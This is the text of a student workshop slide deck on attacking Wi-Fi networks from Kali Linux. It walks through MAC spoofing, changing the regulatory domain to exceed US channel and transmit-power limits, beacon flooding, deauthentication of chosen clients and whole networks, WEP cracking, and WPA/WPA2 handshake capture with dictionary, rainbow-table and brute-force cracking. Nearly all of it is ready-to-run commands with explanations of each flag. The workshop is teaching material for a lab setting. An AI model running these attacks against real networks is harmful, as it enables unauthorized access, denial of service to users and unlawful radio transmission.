ACM Wi-Fi Workshop

ACM Wi-Fi Workshop

Presented By:Chris Rawlings

Brad Emge

Disclaimer

• By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored.

• Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits.

• The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.

Information

• All steps in this slide show were performed and tested on 32-bit kali linux version 1.0.6 with an Alfa AWUSO36H USB wireless card(these are the operating system and wireless card you have in front of you).

• Any statement that beings with ‘#’ is a command to be typed in the terminal

What is Kali Linux

• Debian based Linux operating system

• Designed for the sole purpose of penetration testing, exploitation, and hacking

Booting into Kali Linux

• Start with computer off• Plug in flash drive and USB wireless

card• Boot the computer off of the USB flash

drive• From YUMI select system tools then

kali• Select live (686-pae) from the boot

menu

Post Kali Boot

• Make sure that your computer is not in “airplane” mode– Click applicationssystem

toolspreferencessystem settingsnetwork

– Make sure airplane mode is off– Close that window

Temporarily Connecting to The Internet

• Click the network icon in the upper right– Looks like two computers with a red

circle and a X• Select the MST-PSK-N network• Make sure you are connecting with

the non-realtek wireless adapter• Enter the password “JoeMiner”

Getting Necessary Files

• Open the terminal• Type #wget

http://tinyurl.com/acmwifiworkshopfiles

• Open root under the places menu• Unzip the file and make sure the

files are all in the root folder



Terms and Definitions

• Access Point(AP)• Bandwidth• Channel• Evil Twin• Frequency• Honeypot• IEEE 802.11


• IP Address• ISM Band• MAC Address• Modes of Wi-fi• NIC• Packet


• Rainbow Table• WEP• Wi-Fi• WPA• WPA2• WPS

FINDING THE CORRECT WIRELESS CARD

Open the terminal

Type #airmon-ng

FINDING YOUR MAC ADDRESS

Type #ifconfig wlan1

• ifconfig– program we are using

• wlan1– interface we want information on

#ifconfig wlan1

CHANGING YOUR MAC ADDRESS

Type #ifconfig wlan1 down

• ifconfig– program that we are running

• wlan1– interface we are operating on

• down– disable the interface

#ifconfig wlan1 down

Type #macchanger –m de:ad:be:ef:c0:fe wlan1

• macchanger– program we are using

• -m– manually set the MAC address

• de:ed:be:ef:c0:fe– MAC address of your choice

• wlan1– interface we are changing the MAC of

#macchanger –m de:ad:be:ef:c0:fe wlan1

Type #ifconfig wlan1 up



• down– enable the interface

#ifconfig wlan1 up



• wlan1– interface we are interested in

#ifconfig wlan1

RANDOMLY CHANGING YOUR MAC ADDRESS






Type #macchanger –r wlan1

• macchanger– program we are using

• -r – random MAC address


#macchanger –r wlan1




• up– enable the interface

#ifconfig wlan1 up


• ifconfig– the program we are using

• wlan1– the interface we are interested in

#ifconfig wlan1

CHANGING YOUR MAC ADDRESS BACK TO IT’S FACTORY SETTING






Type #macchanger –p wlan1

• macchanger– the program we are using

• -p– changes the MAC back to factory

settings• wlan1

– the interface we are operating on

#macchanger –p wlan1





#ifconfig wlan1 up


• ifconfig– the program we are using

• wlan1– the interface we are interested in

#ifconfig wlan1

CHANGING THE CHANNEL OF YOUR WIRELESS CARD

type #iwconfig wlan1

• iwconfig– program we are using

• wlan1 – interface we are interested in

#iwconfig wlan1

type #iwconfig wlan1 channel c



• channel– allows you to change the channel

• c– specific channel you wish to use

1,2,3…

#iwconfig wlan1 channel c

type #iwconfig wlan1


• wlan1 – interface we are interested in

#iwconfig wlan1

OPERATING OUTSIDE OF US REGULATION FREQUENCIES

type #iw reg get

• iw– program we are using

• reg– short for regulation

• get– show the iw regulation settings

#iw reg get

type #iw reg set JP



• set– allows us to set the country regulation

• JP– country code for japan

• allows us to operate on channels 12,13,&14

#iw reg set JP

type #iw reg get



• get– show the iw regulation settings

#iw reg get

Type #iwconfig wlan1 channel 14



• channel– allows us to set the channel

• 14– channel we are setting

#iwconfig wlan1 channel 14

Type #iwconfig wlan1

• iwconfig – program we are using


#iwconfig wlan1

CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY

type #iwconfig wlan1 channel c



• channel– allows you to change the channel

• c– specific channel you wish to use

1,2,3…

#iwconfig wlan1 channel c

OPERATING YOUR WIRELESS CARD WITH MORE POWER




#iwconfig wlan1

Type #iw reg set BO



• set– allows us to set the country regulation

• BO– country code for Bolivia

#iw reg set BO

Type #iwconfig wlan1 txpower 30


• wlan1 – interface we are operating on

• txpower– stands for transmit power

• 30– power output in dBm

#iwconfig wlan1 txpower 30




#iwconfig wlan1

Note on Transmit Power

• The power output has increased from .1 Watt to 1 Watt

• With our current equipment(Wi-Fi card and antenna) we will not be violating FCC regulation, however with a higher gain antenna we could be

FINDING THE MODES YOUR WIRELESS CARDS SUPPORTS

Type #airmon-ng

• airmon-ng– program we are using

#airmon-ng

Type #iw phy phy0 info|grep –A3 modes


• phy– search based upon physical device number

• phy0– physical device number from airmon-ng

• info– give us the info about the phy0 device

• | grep– pipes the output into the program grep

• -A3– indicates to output 3 lines are the given search term

• modes– the term we are searching for with grep

#iw phy phy0 info|grep –A3 modes

Modes Supported

• IBSS– ad-hoc mode– computer to computer connection

• managed– allows you to connect to networks– your Wi-Fi card is usually in managed mode

• monitor– promiscuous mode– allows you to view traffic not destined to your card

OPERATING YOUR CARD IN AD-HOC MODE






Type #iwconfig wlan1 mode ad-hoc



• mode– allows us to set a specific mode

• ad-hoc– the mode we will be using

#iwconfig wlan1 mode ad-hoc

Type #iwconfig wlan1 channel 1



• channel– allows us to change the channel

• 1– specific channel we are using 1,2,3…

#iwconfig wlan1 channel 1

Type #iwconfig wlan1 essid ‘nameofnetwork’



• essid– allows us to set the network name

• ‘nameofnetwork’– name of the network

iwconfig wlan1 essid ‘nameofnetwork’

Type #iwconfig wlan1 key s:’password’



• key– allows us to operate a network with a WEP key– a WPA/WPA2 key is not possible(I think)

• s:– indicates the key entered is in ASCII

• ‘password’– the key as an ASCII String

#iwconfig wlan1 key s:’password’





#ifconfig wlan1 up


• iwconfig– the program we are using

• wlan1– the interface we are operating on

#iwconfig wlan1

TURNING OFF AD-HOC MODE

type #iwconfig wlan1 mode managed



• mode– allows us to change the mode of the

adapter• managed

– sets managed mode

OPERATING YOUR CARD IN MONITOR MODE

type #airmon-ng start wlan1

• airmong-ng– program we are using

• start– enables monitor mode

• wlan1– interface we wish to enable monitor

mode on

#airmon-ng start wlan1

type #kill 3018 & kill 3853

• kill– command to stop programs from

running• 3018

– PID of process from slide before• &

– and, allows multiple commands in one line

#kill 3018 & kill 3853

type #iwconfig


#iwconfig

DATA GATHERING IN MONITOR MODE

type #tshark –i mon0

• tshark– program we are using– terminal wireshark

• -i– interface

• mon0– interface we are operating on

#tshark –i mon0

#tshark –i mon0

type ctrl-c

• crtl-c– stops the running program

type #airodump-ng mon0

• airodump-ng– program we are using

• mon0– interface we wish to view wireless

traffic on

#airodump-ng mon0

#airodump-ng mon0

#airodump-ng mon0

• BSSID– MAC address of access point

• station– MAC address of connected client

• Probe– shows what access points a station is

looking for

type ctrl-c

• crtl-c– stops the running program

BEACON FLOODING

What are Beacons

• Management Frame in IEEE 802.11(Wi-Fi)

• Transmitted to announce the presence of a network

• Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.

type #nano ssidlist

• nano– text editor I am using– you may use something else if you

prefer• ssidlist

– filename for the text file that will contain the SSIDS we will be broadcasting

#nano ssidlist

type different network names on separate lines

type ctrl-x, y, enter

• This saves the file in nano• you could also write out the file and

then exit• this may be different if you didn’t

use nano

type #mdk3 mon0 b –f ssidlist

• mdk3– program we are using


• b– means to send out beacon frames

• ssidlist– text files with the network names in it

#mdk3 mon0 b –f ssidlist

#mdk3 mon0 b –f ssidlist

type ctrl-c to stop

• stops the running program

VIEWING PROBE REQUESTS

What are Probe Requests


• A packet sent from a client(computer, phone, etc) to see if a network is within range

• Your devices are constantly sending out Probe Requests and we can view them(also exploit them, but that’s later)

type #airodump-ng mon0

• airodump-ng – program we are using


#airodump-ng mon0

• In a very dense Wi-Fi environment, we will be unable to see the probe requests at first

• to fix this– zoom out

• available from the view menu– stop the program with ctrl-c – zoom in

• available from the view menu

#airodump-ng mon0

PASSIVE NETWORK SCAN

Type #iw dev wlan1 scan passive | grep SSID


• dev– indicates that we are identifying our Wi-Fi card by device number

and not physical number• wlan1

– interface we wish to scan on• passive

– indicates that no packets should be sent• | grep

– program that is used to search the output • SSID

– the word that grep will be searching for

#iw dev wlan1 scan passive | grep SSID

ACTIVE NETWORK SCAN

Type #iwlist wlan1 scan | grep ESSID

• iwlist– program we are using

• wlan1– interface we are scanning on

• scan– indicates we wish to scan

• |grep– program used to search the output of iwlist

• ESSID– the word we are searching for with grep

#iwlist wlan1 scan | grep ESSID

DEAUTHENTICATION

What is Deauthentication


• Allows clients to be kicked off of a wireless access point

• These are naturally occurring in wireless traffic and users do not even recognize it

• We can send excessive amounts of these packets to prevent a client from connecting

DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT

Type #airodump-ng mon0



#airodump-ng mon0

#airodump-ng mon0

• type ctrl-c when you have finished finding your target

Type #iwconfig mon0 channel 11


• mon0– interface we are changing the channel

of• channel

– indicates we are changing the channel• 11

– channel we are changing to

#iwconfig mon0 channel 11

Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0

• aireplay-ng– program we are using

• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this

• -0– indicates deauthentication packet

• 10– number of deauths to send

• -a 00:1a:c4:51:3c:31– access point MAC address

• -c d4:20:6d:41:78:b2– client MAC address

• mon0– interface to send deauth packets out on

#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c

d4:20:6d:41:78:b2 mon0

DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK



• mon0– interface we are using

#airodump-ng mon0

#airodump-ng mon0




• mon0– interface we are changing the channel

of• channel

– indicates we are changing the channel• 11

– channel we are changing to


Type #nano blacklist

• nano– text editor we are using– you may use something else if you

prefer• blacklist

– name of the text file we are editing

#nano blacklist

#nano blacklist

#nano blacklist

• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point

• Type ctrl-x, y, enter– this saves the file

Type #mdk3 mon0 d –b blacklist –c 11


• mon0– interface we are deauthenticating from

• d– indicates deauthentication packets are to be sent

• -b– indicates that we are using a blacklist. We are wanting to attack the indicated

access points• blacklist

– file that has the list of MAC addresses to deauth• -c

– indicates what channel to use• 11

– channel the access points are operating on

#mdk3 mon0 d –b blacklist –c 11

#mdk3 mon0 d –b blacklist –c 11

• type ctrl-c to stop the program

DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS



• mon0– interface we are using

#airodump-ng mon0

Type #nano blacklist


prefer• blacklist

– name of the text file we are editing

#nano blacklist

#nano blacklist

#nano blacklist

• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point

• Type ctrl-x, y, enter– this saves the file

Type #mdk3 mon0 d –b blacklist –c 6,11


• mon0– interface we are deauthenticating from

• d– indicates deauthentication packets are to be sent

• -b– indicates that we are using a blacklist. We are wanting to attack the indicated

access points• blacklist

– file that has the list of MAC addresses to deauth• -c

– indicates what channel to use• 6,11

– channels the access points are operating on

#mdk3 mon0 d –b blacklist –c 6,11

#mdk3 mon0 d –b blacklist –c 6,11

• type ctrl-c to stop the program

CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT




#airodump-ng mon0

#airodump-ng mon0

• type ctrl-c when done finding the access point to wish for clients to connect to

Type #nano whitelist


prefer• whitelist

– text file with the list of MAC addresses of the access points you want clients to be able to connect to

#nano whitelist

#nano whitelist

#nano whitelist

• note that it is possible to enter multiple MAC addresses in this file as well

• type ctrl-x, y, enter with finished

Type #mdk3 mon0 d –w whitelist


• mon0– interface to send deauth packets from

• d– indicates to deauthenticate clients

• -w– indicates we are whitelisting specific access points

• whitelist– text file that contains the MAC address of the AP we want

clients to connect to– deauths all APs other than those on this list

#mdk3 mon0 d –w whitelist

#mdk3 mon0 d –w whitelist

• type ctrl-c when done sending deauth packets

BREAKING ENCRYPTION

BREAKING WEP ENCRYPTION

Breaking WEP Encryption


• Steps– Identify Network– Begin collecting data– cause extra data to be generated

• optional• will not want to be done if conducting a

passive attack– start cracking once the number of

Initialization Vectors(IVs) reaches 50,000




#airodump-ng mon0

#airodump-ng mon0

• Notice that in the ENC column it says WEP.

• Any WEP encrypted access point is vulnerable.


#airodump-ng mon0

#airodump-ng mon0


• open a new table in the terminal window

• filenew tab

Type #aireplay-ng --ignore-negative-one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0


• --ignore-negative-one– needed because of a potential driver issue– this may not be needed

• -1– Associates with the Access Point

• -a 12:18:0a:21:ae:e4– indicates MAC address of AP & MAC of the AP

• -h 00:c0:ca:75:6f:ab– sets source MAC address & MAC of our wireless card


Type #aireplay-ng --ignore-negative-one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0

Type #aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0


• --ignore-negative-one– needed because of a potential driver issue– this may not be needed

• -3– ARP Request Replay Attack– most effective way to generate new IVs

• -b 12:18:0a:21:ae:e4– indicates MAC address of AP & MAC of the AP

• -h 00:c0:ca:75:6f:ab– sets source MAC address & MAC of our wireless card


#aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0


• Go back to the first tab and wait until the number in the data column >50000

• This number is not set since the attack we are doing is based upon statistics.

• Sometimes you can break it with half as many and sometimes you need twice as many or more.

• The length of the key also contributes to the number of IVs that are needed



• Open a new tab in the terminal

Type #aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap

• aircrack-ng– program we are using

• -b 12:18:0a:21:ae:e4– the MAC address of the target Access

Point• acm_wep-01.cap

– the file that contains the files captures with airodump-ng

#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap


• If you are not successful wait until the number captured increases to the suggested number and then try again



• If successful, you will see the image previous.

• Go back to the other two tabs and stop the running programs using ctrl-c

BREAKING WPA&WPA2 ENCRYPTION

Breaking WPA&WPA2 Encryption

• What makes WPA&WPA2 more difficult to break into?– larger key– does not use RC4– Used Network as well as password to

computer the key


• No short cut like in breaking WEP• Must brute force the key• Hope that it is a dictionary word or

something very simple such as ten numbers

• Three networks set up for breaking into– dictionary password– 8-char alpha-numeric– random


• Process– Begin listen to the packets on that

network– Capture 4-way handshake between

AP and client• this can be done passively or by

deauthentication – take that captured handshake and try

different sources of passwords to break it

– wait and see

BREAKING WPA WITH A DICTIONARY LIST



• mon0– interface we are using to listen on

#airodump-ng mon0

#airodump-ng mon0

• After finding the target network type ctrl-c to stop running the program

Type #airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0


• -c 11– says to listen on channel 11

• --bssid 00:1a:c4:51:3c:31– listen for traffic to and from this Access point

• --w acm_dictionary– file to save the data to

• mon0– interface we are listening on

#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0



• The previous image shows connected clients to the specific access point

• At this point you could wait for the handshake to occur or you could force it to occur by means of deauth

Breaking WPA&WPA2 encryption

• Open a new tab in terminal• This can be done by going to

filenew tab



• mon0 – interface we are operating on

• channel– allows us to change the channel

• 11– specific channel we are changing the

interface to


Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0


• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this

• -0– indicates deauthentication packet

• 10– number of deauths to send

• -a 00:1a:c4:51:3c:31– access point MAC address

• -c d4:20:6d:41:78:b2– client MAC address

• mon0– interface to send deauth packets out on

#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0

Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0


• Go back to the first tab and you should see an image similar to the following

• The WPA handshake in the top must be there to proceed



• Make sure the dictionary files that you downloaded earlier are in the same folder as your .cap files.

• This should be in the root directory• We will be demonstrating using the

english.txt file, however feel free to experiment with the others

Type #aircrack-ng acm_dictionary-01.cap –w english.txt

• aircrack-ng– program we are using to crack the key

• acm_dictionary-01.cap– network capture file with the

handshake in it• -w

– indicates that a word list is to be used• english.txt

– the file name containing the wordlist

#aircrack-ng acm_dictionary-01.cap –w english.txt


• If not successful that means that the password was not in that list of words

• You could try using a larger word list or begin brute forcing to break the password

• If successful you should see the following


BREAKING WPA&WPA2 USING A RAINBOW TABLE

What is a Rainbow Table

• pre-computed table of hashed value• they are built for a specific SSID(network

name)• built using a dictionary or some other source of

passwords• Takes a long time to compute and is a very

large file– Usually done on a very powerful computer

• The rainbow can then be used to quickly find a password

Breaking WPA&WPA2 using a Rainbow Table

• Because we already have the handshake, we do not need to re-capture it.

• We will be using the same .cap file as the previous example


• Make sure the rainbow table that you downloaded earlier is in the same folder as your .cap files.

• This should be in the root directory• We will be demonstrating using the

acm_dictionary_hash file• This file was created from the

english.txt dictionary file specifically for this SSID

Type #cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –s

acm_dictionary• cowpatty– program we are using

• -r acm_dictionary-01.cap– the file that has the four way handshake in it

• -d acm_dictionary_hash– the file that is the pre-computed hashed for

this specific SSID• -s acm_dictionary

– telling cowpatty what the name of the network is

#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –

s acm_dictionary


s acm_dictionary• If the password was not in the

source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password

• If successful, you will see the following image


s acm_dictionary

COMPUTING A PERSONALIZED RAINBOW TABLE

Computing a personalized rainbow table

• As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc

• This is also used when you know the network name in advance and wish to prepare for the attack on the network



• mon0– interface we are using to listen on

#airodump-ng mon0

#airodump-ng mon0

• After finding the target network type ctrl-c to stop running the program

Type #genpmk –f english.txt –d acm_dictionary_hash –s

acm_dictionary• genpmk

– the program we are using• -f english.txt

– the file serving as the source of passwords• -d acm_dictionary_hash

– what the rainbow table should be saved as• -s acm_dictionary

– telling genpmk what the SSID is so that it can be hashed appropriately

#genpmk –f english.txt –d acm_dictionary_hash –s

acm_dictionary

#genpmk –f english.txt –d acm_dictionary_hash –s

acm_dictionary

BRUTE FORCING A PASSWORD

Brute forcing a password

• This is the most time consuming method although is guaranteed to eventually find the password


• As you already have the four way hand shake, we will be moving right into the cracking portion of this example

Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w –

acm_dictioanry-01.cap• john

– program we using. short for john the ripper• -stdout

– directs standard out to aircrack-ng• -incremental:all

– will increment through all possible passwords• | aircrack-ng

– second program we are running with the input being supplied by john the ripper

• -b 00:1a:c4:51:3c:31– tells aircrack-ng which access point to attack

• -w –– this is where the standard output of john the ripper is going

• acm_dictionary-01.cap– the file containing the four way handshake to be brute forced

Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap

Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap


• The previous slide shows John the Ripper and aircrack-ng being used together

• There are ways to cut down on the number of possible passwords, for example– if you know the password is 14 characters, you

can have john skip passwords less than and greater than 14 characters.

• This is the longest way to crack a password but also a guaranteed way to do it

Documents

ACM Wi-Fi Workshop